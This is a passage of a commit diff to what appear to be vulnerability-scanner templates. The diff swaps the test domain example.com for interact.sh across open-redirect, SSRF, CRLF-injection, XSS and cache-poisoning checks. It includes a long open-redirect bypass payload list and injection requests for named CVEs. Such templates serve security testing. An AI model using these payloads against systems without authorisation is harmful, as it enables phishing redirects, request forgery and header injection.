- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
# Enhanced by mp on 2022/04/13

4
cves/2021/CVE-2021-25074.yaml
View File

@ -18,12 +18,12 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/webp-converter-for-media/includes/passthru.php?src=https://example.com"
- "{{BaseURL}}/wp-content/plugins/webp-converter-for-media/includes/passthru.php?src=https://interact.sh"
matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
# Enhanced by mp on 2022/04/21

4
cves/2021/CVE-2021-25111.yaml
View File

@ -17,10 +17,10 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/wp-admin/admin-ajax.php?action=heartbeat&admin_custom_language_toggle=1&admin_custom_language_return_url=https://example.com"
- "{{BaseURL}}/wp-admin/admin-ajax.php?action=heartbeat&admin_custom_language_toggle=1&admin_custom_language_return_url=https://interact.sh"
matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)attacker\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1

4
cves/2021/CVE-2021-27132.yaml
View File

@ -19,7 +19,7 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/test.txt%0d%0aSet-Cookie:CRLFInjection=Test%0d%0aLocation:%20example.com%0d%0aX-XSS-Protection:0"
- "{{BaseURL}}/test.txt%0d%0aSet-Cookie:CRLFInjection=Test%0d%0aLocation:%20interact.sh%0d%0aX-XSS-Protection:0"
matchers-condition: and
matchers:
@ -32,7 +32,7 @@ requests:
words:
- "Content-Disposition: attachment;filename=test.txt"
- "Set-Cookie:CRLFInjection=Test"
- "Location: example.com"
- "Location: interact.sh"
- "X-XSS-Protection:0"
part: header
condition: and

2
cves/2021/CVE-2021-27905.yaml
View File

@ -27,7 +27,7 @@ requests:
Connection: close
- |
GET /solr/{{core}}/replication/?command=fetchindex&masterUrl=https://example.com HTTP/1.1
GET /solr/{{core}}/replication/?command=fetchindex&masterUrl=https://interact.sh HTTP/1.1
Host: {{Hostname}}
Accept-Language: en
Connection: close

4
cves/2021/CVE-2021-29622.yaml
View File

@ -19,10 +19,10 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/new/newhttp://example.com"
- "{{BaseURL}}/new/newhttp://interact.sh"
matchers:
- type: regex
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
part: header

6
cves/2021/CVE-2021-32618.yaml
View File

@ -6,7 +6,7 @@ info:
severity: medium
description: There is code in FS to validate that the url specified in the next parameter is either relative OR has the same netloc (network location) as the requesting URL. This check utilizes Pythons urlsplit
library. However many browsers are very lenient on the kind of URL they accept and 'fill in the blanks' when presented with a possibly incomplete URL. As a concrete example - setting http://login?next=\\\github.com
will pass FS's relative URL check however many browsers will gladly convert this to http://example.com.
will pass FS's relative URL check however many browsers will gladly convert this to http://interact.sh.
reference:
- https://github.com/Flask-Middleware/flask-security/security/advisories/GHSA-6qmf-fj6m-686c
- https://github.com/Flask-Middleware/flask-security/issues/486
@ -21,10 +21,10 @@ info:
requests:
- method: GET
path:
- '{{BaseURL}}/login?next=\\\example.com'
- '{{BaseURL}}/login?next=\\\interact.sh'
matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1

4
cves/2021/CVE-2021-3377.yaml
View File

@ -20,7 +20,7 @@ info:
requests:
- raw:
- |+
GET /\u001B]8;;https://example.com"/onmouseover="alert(1)\u0007example\u001B]8;;\u0007 HTTP/1.1
GET /\u001B]8;;https://interact.sh"/onmouseover="alert(1)\u0007example\u001B]8;;\u0007 HTTP/1.1
Host: {{Hostname}}
Connection: close
@ -34,6 +34,6 @@ requests:
- type: word
words:
- "com\"/onmouseover=\"alert(1)\">"
- "sh\"/onmouseover=\"alert(1)\">"
# Enhanced by mp on 2022/04/21

4
cves/2021/CVE-2021-34370.yaml
View File

@ -20,10 +20,10 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/ssoAdapter/logoutAction.do?servProvCode=SAFVC&successURL=https://example.com/"
- "{{BaseURL}}/ssoAdapter/logoutAction.do?servProvCode=SAFVC&successURL=https://interact.sh/"
matchers:
- type: regex
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
part: header

10
cves/2021/CVE-2021-34621.yaml
View File

@ -34,11 +34,11 @@ requests:
-----------------------------138742543134772812001999326589
Content-Disposition: form-data; name="reg_email"
{{randstr}}@example.com
{{randstr}}@interact.sh
-----------------------------138742543134772812001999326589
Content-Disposition: form-data; name="reg_password"
{{randstr}}@example.com
{{randstr}}@interact.sh
-----------------------------138742543134772812001999326589
Content-Disposition: form-data; name="reg_password_present"
@ -46,11 +46,11 @@ requests:
-----------------------------138742543134772812001999326589
Content-Disposition: form-data; name="reg_first_name"
{{randstr}}@example.com
{{randstr}}@interact.sh
-----------------------------138742543134772812001999326589
Content-Disposition: form-data; name="reg_last_name"
{{randstr}}@example.com
{{randstr}}@interact.sh
-----------------------------138742543134772812001999326589
Content-Disposition: form-data; name="_wp_http_referer"
@ -89,7 +89,7 @@ requests:
Origin: {{BaseURL}}
Referer: {{BaseURL}}
log={{randstr}}@example.com&pwd={{randstr}}@example.com&wp-submit=Log+In
log={{randstr}}@interact.sh&pwd={{randstr}}@interact.sh&wp-submit=Log+In
- |
GET /wp-admin/ HTTP/1.1

4
cves/2021/CVE-2021-3654.yaml
View File

@ -21,13 +21,13 @@ requests:
- method: GET
path:
- '{{BaseURL}}//example.com/%2f..'
- '{{BaseURL}}//interact.sh/%2f..'
matchers-condition: and
matchers:
- type: regex
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
part: header
- type: status

4
cves/2021/CVE-2021-39501.yaml
View File

@ -20,12 +20,12 @@ requests:
- method: GET
path:
- '{{BaseURL}}/index.php?m=user&c=Users&a=logout&referurl=https://example.com'
- '{{BaseURL}}/index.php?m=user&c=Users&a=logout&referurl=https://interact.sh'
matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?example\.com(?:\s*?)$'
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?interact\.sh(?:\s*?)$'
# Enhanced by mp on 2022/03/16

4
cves/2021/CVE-2021-41826.yaml
View File

@ -19,7 +19,7 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/auth/logout?continue=//example.com"
- "{{BaseURL}}/auth/logout?continue=//interact.sh"
matchers-condition: and
matchers:
@ -33,6 +33,6 @@ requests:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
# Enhanced by mp on 2022/02/27

4
cves/2021/CVE-2021-44528.yaml
View File

@ -21,14 +21,14 @@ requests:
- |
GET / HTTP/1.1
Host: {{Hostname}}
X-Forwarded-Host: //example.com
X-Forwarded-Host: //interact.sh
matchers-condition: and
matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$'
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$'
- type: status
status:

2
cves/2021/CVE-2021-45092.yaml
View File

@ -19,7 +19,7 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/lab.html?vpath=//example.com"
- "{{BaseURL}}/lab.html?vpath=//interact.sh"
matchers:
- type: regex

4
cves/2021/CVE-2021-46379.yaml
View File

@ -22,10 +22,10 @@ info:
requests:
- method: GET
path:
- '{{BaseURL}}/boafrm/formWlanRedirect?redirect-url=http://example.com&wlan_id=1'
- '{{BaseURL}}/boafrm/formWlanRedirect?redirect-url=http://interact.sh&wlan_id=1'
matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1

4
cves/2022/CVE-2022-0165.yaml
View File

@ -17,10 +17,10 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/wp-admin/admin-ajax.php?action=kc_get_thumbn&id=https://example.com"
- "{{BaseURL}}/wp-admin/admin-ajax.php?action=kc_get_thumbn&id=https://interact.sh"
matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'

4
cves/2022/CVE-2022-0692.yaml
View File

@ -20,12 +20,12 @@ info:
requests:
- method: GET
path:
- '{{BaseURL}}/index.php/example.com'
- '{{BaseURL}}/index.php/interact.sh'
matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
# Enhanced by mp on 2022/03/08

4
misconfiguration/caddy-open-redirect.yaml
View File

@ -11,10 +11,10 @@ info:
requests:
- method: GET
path:
- '{{BaseURL}}//example.com/%2F..'
- '{{BaseURL}}//interact.sh/%2F..'
matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1

2
token-spray/api-debounce.yaml
View File

@ -13,7 +13,7 @@ self-contained: true
requests:
- method: GET
path:
- "https://api.debounce.io/v1/?api={{token}}&email=test@example.com"
- "https://api.debounce.io/v1/?api={{token}}&email=test@interact.sh"
matchers:
- type: word

2
token-spray/api-fullhunt.yaml
View File

@ -15,7 +15,7 @@ self-contained: true
requests:
- method: GET
path:
- https://fullhunt.io/api/v1/domain/example.com/details
- https://fullhunt.io/api/v1/domain/interact.sh/details
headers:
X-API-Key: "{{token}}"

2
token-spray/api-sslmate.yaml
View File

@ -14,7 +14,7 @@ self-contained: true
requests:
- method: GET
path:
- https://sslmate.com/api/v2/certs/example.com?expand=current.crt
- https://sslmate.com/api/v2/certs/interact.sh?expand=current.crt
headers:
Authorization: Bearer {{token}}

10
vulnerabilities/generic/cache-poisoning.yaml
View File

@ -13,9 +13,9 @@ requests:
- raw:
- |
GET /?{{randstr}}=9 HTTP/1.1
X-Forwarded-Prefix: prefix.cache.example.com
X-Forwarded-Host: host.cache.example.com
X-Forwarded-For: for.cache.example.com
X-Forwarded-Prefix: prefix.cache.interact.sh
X-Forwarded-Host: host.cache.interact.sh
X-Forwarded-For: for.cache.interact.sh
- |
GET /?{{randstr}}=9 HTTP/1.1
@ -24,10 +24,10 @@ requests:
matchers:
- type: dsl
dsl:
- 'contains(body_2, "cache.example.com")'
- 'contains(body_2, "cache.interact.sh")'
extractors:
- type: regex
part: response
regex:
- "(prefix|host|for).cache.example.com"
- "(prefix|host|for).cache.interact.sh"

178
vulnerabilities/generic/open-redirect.yaml
View File

@ -15,94 +15,94 @@ requests:
payloads:
redirect:
- '%0a/example.com/'
- '%0d/example.com/'
- '%00/example.com/'
- '%09/example.com/'
- '%5C%5Cexample.com/%252e%252e%252f'
- '%5Cexample.com'
- '%5cexample.com/%2f%2e%2e'
- '%5c{{RootURL}}example.com/%2f%2e%2e'
- '../example.com'
- '.example.com'
- '/%5cexample.com'
- '////\;@example.com'
- '////example.com'
- '///example.com'
- '///example.com/%2f%2e%2e'
- '///example.com@//'
- '///{{RootURL}}example.com/%2f%2e%2e'
- '//;@example.com'
- '//\/example.com/'
- '//\@example.com'
- '//\example.com'
- '//\texample.com/'
- '//example.com/%2F..'
- '//example.com//'
- '//example.com@//'
- '//example.com\texample.com/'
- '//https://example.com@//'
- '/<>//example.com'
- '/\/\/example.com/'
- '/\/example.com'
- '/\example.com'
- '/example.com'
- '/example.com/%2F..'
- '/example.com/'
- '/example.com/..;/css'
- '/https:example.com'
- '/{{RootURL}}example.com/'
- '/〱example.com'
- '/〵example.com'
- '/ゝexample.com'
- '/ーexample.com'
- '/ーexample.com'
- '<>//example.com'
- '@example.com'
- '@https://example.com'
- '\/\/example.com/'
- 'example%E3%80%82com'
- 'example.com'
- 'example.com/'
- 'example.com//'
- 'example.com;@'
- 'https%3a%2f%2fexample.com%2f'
- 'https:%0a%0dexample.com'
- 'https://%0a%0dexample.com'
- 'https://%09/example.com'
- 'https://%2f%2f.example.com/'
- 'https://%3F.example.com/'
- 'https://%5c%5c.example.com/'
- 'https://%5cexample.com@'
- 'https://%23.example.com/'
- 'https://.example.com'
- 'https://////example.com'
- 'https:///example.com'
- 'https:///example.com/%2e%2e'
- 'https:///example.com/%2f%2e%2e'
- 'https:///example.com@example.com/%2e%2e'
- 'https:///example.com@example.com/%2f%2e%2e'
- 'https://:80#@example.com/'
- 'https://:80?@example.com/'
- 'https://:@\@example.com'
- 'https://:@example.com\@example.com'
- 'https://:@example.com\@WillBeReplaced.com'
- 'https://;@example.com'
- 'https://\texample.com/'
- 'https://example.com/example.com'
- 'https://example.com/https://example.com/'
- 'https://www.\.example.com'
- 'https:/\/\example.com'
- 'https:/\example.com'
- 'https:/example.com'
- 'https:example.com'
- '{{RootURL}}example.com'
- '〱example.com'
- '〵example.com'
- 'ゝexample.com'
- 'ーexample.com'
- 'ーexample.com'
- '?page=example.com&_url=example.com&callback=example.com&checkout_url=example.com&content=example.com&continue=example.com&continueTo=example.com&counturl=example.com&data=example.com&dest=example.com&dest_url=example.com&dir=example.com&document=example.com&domain=example.com&done=example.com&download=example.com&feed=example.com&file=example.com&host=example.com&html=example.com&http=example.com&https=example.com&image=example.com&image_src=example.com&image_url=example.com&imageurl=example.com&include=example.com&langTo=example.com&media=example.com&navigation=example.com&next=example.com&open=example.com&out=example.com&page=example.com&page_url=example.com&pageurl=example.com&path=example.com&picture=example.com&port=example.com&proxy=example.com&redir=example.com&redirect=example.com&redirectUri=example.com&redirectUrl=example.com&reference=example.com&referrer=example.com&req=example.com&request=example.com&retUrl=example.com&return=example.com&returnTo=example.com&return_path=example.com&return_to=example.com&rurl=example.com&show=example.com&site=example.com&source=example.com&src=example.com&target=example.com&to=example.com&uri=example.com&url=example.com&val=example.com&validate=example.com&view=example.com&window=example.com&redirect_to=example.com&ret=example.com&r2=example.com&img=example.com&u=example.com&r=example.com&URL=example.com&AuthState=example.com'
- '%0a/interact.sh/'
- '%0d/interact.sh/'
- '%00/interact.sh/'
- '%09/interact.sh/'
- '%5C%5Cinteract.sh/%252e%252e%252f'
- '%5Cinteract.sh'
- '%5cinteract.sh/%2f%2e%2e'
- '%5c{{RootURL}}interact.sh/%2f%2e%2e'
- '../interact.sh'
- '.interact.sh'
- '/%5cinteract.sh'
- '////\;@interact.sh'
- '////interact.sh'
- '///interact.sh'
- '///interact.sh/%2f%2e%2e'
- '///interact.sh@//'
- '///{{RootURL}}interact.sh/%2f%2e%2e'
- '//;@interact.sh'
- '//\/interact.sh/'
- '//\@interact.sh'
- '//\interact.sh'
- '//\tinteract.sh/'
- '//interact.sh/%2F..'
- '//interact.sh//'
- '//interact.sh@//'
- '//interact.sh\tinteract.sh/'
- '//https://interact.sh@//'
- '/<>//interact.sh'
- '/\/\/interact.sh/'
- '/\/interact.sh'
- '/\interact.sh'
- '/interact.sh'
- '/interact.sh/%2F..'
- '/interact.sh/'
- '/interact.sh/..;/css'
- '/https:interact.sh'
- '/{{RootURL}}interact.sh/'
- '/〱interact.sh'
- '/〵interact.sh'
- '/ゝinteract.sh'
- '/ーinteract.sh'
- '/ーinteract.sh'
- '<>//interact.sh'
- '@interact.sh'
- '@https://interact.sh'
- '\/\/interact.sh/'
- 'interact%E3%80%82sh'
- 'interact.sh'
- 'interact.sh/'
- 'interact.sh//'
- 'interact.sh;@'
- 'https%3a%2f%2finteract.sh%2f'
- 'https:%0a%0dinteract.sh'
- 'https://%0a%0dinteract.sh'
- 'https://%09/interact.sh'
- 'https://%2f%2f.interact.sh/'
- 'https://%3F.interact.sh/'
- 'https://%5c%5c.interact.sh/'
- 'https://%5cinteract.sh@'
- 'https://%23.interact.sh/'
- 'https://.interact.sh'
- 'https://////interact.sh'
- 'https:///interact.sh'
- 'https:///interact.sh/%2e%2e'
- 'https:///interact.sh/%2f%2e%2e'
- 'https:///interact.sh@interact.sh/%2e%2e'
- 'https:///interact.sh@interact.sh/%2f%2e%2e'
- 'https://:80#@interact.sh/'
- 'https://:80?@interact.sh/'
- 'https://:@\@interact.sh'
- 'https://:@interact.sh\@interact.sh'
- 'https://:@interact.sh\@WillBeReplaced.com'
- 'https://;@interact.sh'
- 'https://\tinteract.sh/'
- 'https://interact.sh/interact.sh'
- 'https://interact.sh/https://interact.sh/'
- 'https://www.\.interact.sh'
- 'https:/\/\interact.sh'
- 'https:/\interact.sh'
- 'https:/interact.sh'
- 'https:interact.sh'
- '{{RootURL}}interact.sh'
- '〱interact.sh'
- '〵interact.sh'
- 'ゝinteract.sh'
- 'ーinteract.sh'
- 'ーinteract.sh'
- '?page=interact.sh&_url=interact.sh&callback=interact.sh&checkout_url=interact.sh&content=interact.sh&continue=interact.sh&continueTo=interact.sh&counturl=interact.sh&data=interact.sh&dest=interact.sh&dest_url=interact.sh&dir=interact.sh&document=interact.sh&domain=interact.sh&done=interact.sh&download=interact.sh&feed=interact.sh&file=interact.sh&host=interact.sh&html=interact.sh&http=interact.sh&https=interact.sh&image=interact.sh&image_src=interact.sh&image_url=interact.sh&imageurl=interact.sh&include=interact.sh&langTo=interact.sh&media=interact.sh&navigation=interact.sh&next=interact.sh&open=interact.sh&out=interact.sh&page=interact.sh&page_url=interact.sh&pageurl=interact.sh&path=interact.sh&picture=interact.sh&port=interact.sh&proxy=interact.sh&redir=interact.sh&redirect=interact.sh&redirectUri=interact.sh&redirectUrl=interact.sh&reference=interact.sh&referrer=interact.sh&req=interact.sh&request=interact.sh&retUrl=interact.sh&return=interact.sh&returnTo=interact.sh&return_path=interact.sh&return_to=interact.sh&rurl=interact.sh&show=interact.sh&site=interact.sh&source=interact.sh&src=interact.sh&target=interact.sh&to=interact.sh&uri=interact.sh&url=interact.sh&val=interact.sh&validate=interact.sh&view=interact.sh&window=interact.sh&redirect_to=interact.sh&ret=interact.sh&r2=interact.sh&img=interact.sh&u=interact.sh&r=interact.sh&URL=interact.sh&AuthState=interact.sh'
stop-at-first-match: true
matchers-condition: and
@ -111,7 +111,7 @@ requests:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
- type: status
status:

4
vulnerabilities/httpbin/httpbin-open-redirect.yaml
View File

@ -15,13 +15,13 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/redirect-to?url=https%3A%2F%2Fexample.com"
- "{{BaseURL}}/redirect-to?url=https%3A%2F%2Finteract.sh"
matchers-condition: and
matchers:
- type: dsl
dsl:
- 'location == "https://example.com"'
- 'location == "https://interact.sh"'
- type: status
status:

6
vulnerabilities/ibm/ibm-websphere-ssrf.yaml
View File

@ -11,8 +11,8 @@ info:
requests:
- method: GET
path:
- '{{BaseURL}}/docpicker/internal_proxy/http/example.com'
- '{{BaseURL}}/wps/PA_WCM_Authoring_UI/proxy/http/example.com'
- '{{BaseURL}}/docpicker/internal_proxy/http/interact.sh'
- '{{BaseURL}}/wps/PA_WCM_Authoring_UI/proxy/http/interact.sh'
redirects: true
max-redirects: 2
@ -26,4 +26,4 @@ requests:
- type: word
words:
- "<title>Example Domain</title>"
- "<h1> Interactsh Server </h1>"

2
vulnerabilities/linkerd/linkerd-ssrf.yaml
View File

@ -13,7 +13,7 @@ requests:
path:
- "{{BaseURL}}"
headers:
l5d-dtab: /svc/* => /$/inet/example.com/443
l5d-dtab: /svc/* => /$/inet/interact.sh/443
matchers-condition: or
matchers:

4
vulnerabilities/netsweeper/netsweeper-open-redirect.yaml
View File

@ -12,10 +12,10 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/webadmin/authportal/bounce.php?url=https://example.com/"
- "{{BaseURL}}/webadmin/authportal/bounce.php?url=https://interact.sh/"
matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'

4
vulnerabilities/other/aspnuke-openredirect.yaml
View File

@ -9,10 +9,10 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/gotoURL.asp?url=example.com&id=43569"
- "{{BaseURL}}/gotoURL.asp?url=interact.sh&id=43569"
matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*:\s*)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?example\.com(?:\s*)$'
- '(?m)^(?:Location\s*:\s*)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?interact\.sh(?:\s*)$'

26
vulnerabilities/other/bitrix-open-redirect.yaml
View File

@ -12,25 +12,25 @@ info:
requests:
- method: GET
path:
- '{{BaseURL}}/bitrix/rk.php?goto=https://example.com'
- '{{BaseURL}}/bitrix/redirect.php?event1=&event2=&event3=&goto=https://example.com'
- '{{BaseURL}}/bitrix/redirect.php?event3=352513&goto=https://example.com'
- '{{BaseURL}}/bitrix/redirect.php?event1=demo_out&event2=sm_demo&event3=pdemo&goto=https://example.com'
- '{{BaseURL}}/bitrix/redirect.php?site_id=s1&event1=select_product_t1&event2=contributions&goto=https://example.com'
- '{{BaseURL}}/bitrix/redirect.php?event1=&event2=&event3=download&goto=https://example.com'
- '{{BaseURL}}/bitrix/rk.php?id=28&site_id=s2&event1=banner&event2=click&event3=3+%2F+%5B28%5D+%5BBANNER_AREA_FOOTER2%5D+%D0%9F%D0%BE%D1%81%D0%B5%D1%82%D0%B8%D1%82%D0%B5+%D0%B2%D0%B2%D0%BE%D0%B4%D0%BD%D1%83%D1%8E+%D0%B1%D0%B5%D1%81%D0%BF%D0%BB%D0%B0%D1%82%D0%BD%D1%83%D1%8E+%D0%BB%D0%B5%D0%BA%D1%86%D0%B8%D1%8E+APTOS&goto=https://example.com'
- '{{BaseURL}}/bitrix/rk.php?id=84&site_id=n1&event1=banner&event2=click&event3=1+%2F+%5B84%5D+%5BMOBILE_HOME%5D+Love+Card&goto=https://example.com'
- '{{BaseURL}}/bitrix/rk.php?id=691&site_id=s3&event1=banner&event2=click&event3=1+%2F+%5B691%5D+%5BNEW_INDEX_BANNERS%5D+Trade-in+football&goto=https://example.com'
- '{{BaseURL}}/bitrix/rk.php?id=129&event1=banner&event2=click&event3=5+%2F+%5B129%5D+%5BGARMIN_AKCII%5D+Garmin+%E1%EE%ED%F3%F1+%ED%EE%E2%EE%F1%F2%FC+%E2+%E0%EA%F6%E8%E8&goto=https://example.com'
- '{{BaseURL}}/bitrix/redirect.php?event1=%D0%A1%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5+%D0%B4%D0%BE%D0%BA%D0%BB%D0%B0%D0%B4%D1%8B&event2=&event3=download&goto=https://example.com'
- '{{BaseURL}}/bitrix/redirect.php?event1=%D0%A1%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5+%D0%B4%D0%BE%D0%BA%D0%BB%D0%B0%D0%B4%D1%8B&event2=&event3=download&goto=https://example.com'
- '{{BaseURL}}/bitrix/rk.php?goto=https://interact.sh'
- '{{BaseURL}}/bitrix/redirect.php?event1=&event2=&event3=&goto=https://interact.sh'
- '{{BaseURL}}/bitrix/redirect.php?event3=352513&goto=https://interact.sh'
- '{{BaseURL}}/bitrix/redirect.php?event1=demo_out&event2=sm_demo&event3=pdemo&goto=https://interact.sh'
- '{{BaseURL}}/bitrix/redirect.php?site_id=s1&event1=select_product_t1&event2=contributions&goto=https://interact.sh'
- '{{BaseURL}}/bitrix/redirect.php?event1=&event2=&event3=download&goto=https://interact.sh'
- '{{BaseURL}}/bitrix/rk.php?id=28&site_id=s2&event1=banner&event2=click&event3=3+%2F+%5B28%5D+%5BBANNER_AREA_FOOTER2%5D+%D0%9F%D0%BE%D1%81%D0%B5%D1%82%D0%B8%D1%82%D0%B5+%D0%B2%D0%B2%D0%BE%D0%B4%D0%BD%D1%83%D1%8E+%D0%B1%D0%B5%D1%81%D0%BF%D0%BB%D0%B0%D1%82%D0%BD%D1%83%D1%8E+%D0%BB%D0%B5%D0%BA%D1%86%D0%B8%D1%8E+APTOS&goto=https://interact.sh'
- '{{BaseURL}}/bitrix/rk.php?id=84&site_id=n1&event1=banner&event2=click&event3=1+%2F+%5B84%5D+%5BMOBILE_HOME%5D+Love+Card&goto=https://interact.sh'
- '{{BaseURL}}/bitrix/rk.php?id=691&site_id=s3&event1=banner&event2=click&event3=1+%2F+%5B691%5D+%5BNEW_INDEX_BANNERS%5D+Trade-in+football&goto=https://interact.sh'
- '{{BaseURL}}/bitrix/rk.php?id=129&event1=banner&event2=click&event3=5+%2F+%5B129%5D+%5BGARMIN_AKCII%5D+Garmin+%E1%EE%ED%F3%F1+%ED%EE%E2%EE%F1%F2%FC+%E2+%E0%EA%F6%E8%E8&goto=https://interact.sh'
- '{{BaseURL}}/bitrix/redirect.php?event1=%D0%A1%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5+%D0%B4%D0%BE%D0%BA%D0%BB%D0%B0%D0%B4%D1%8B&event2=&event3=download&goto=https://interact.sh'
- '{{BaseURL}}/bitrix/redirect.php?event1=%D0%A1%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5+%D0%B4%D0%BE%D0%BA%D0%BB%D0%B0%D0%B4%D1%8B&event2=&event3=download&goto=https://interact.sh'
stop-at-first-match: true
matchers-condition: and
matchers:
- type: regex
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
part: header
- type: status

4
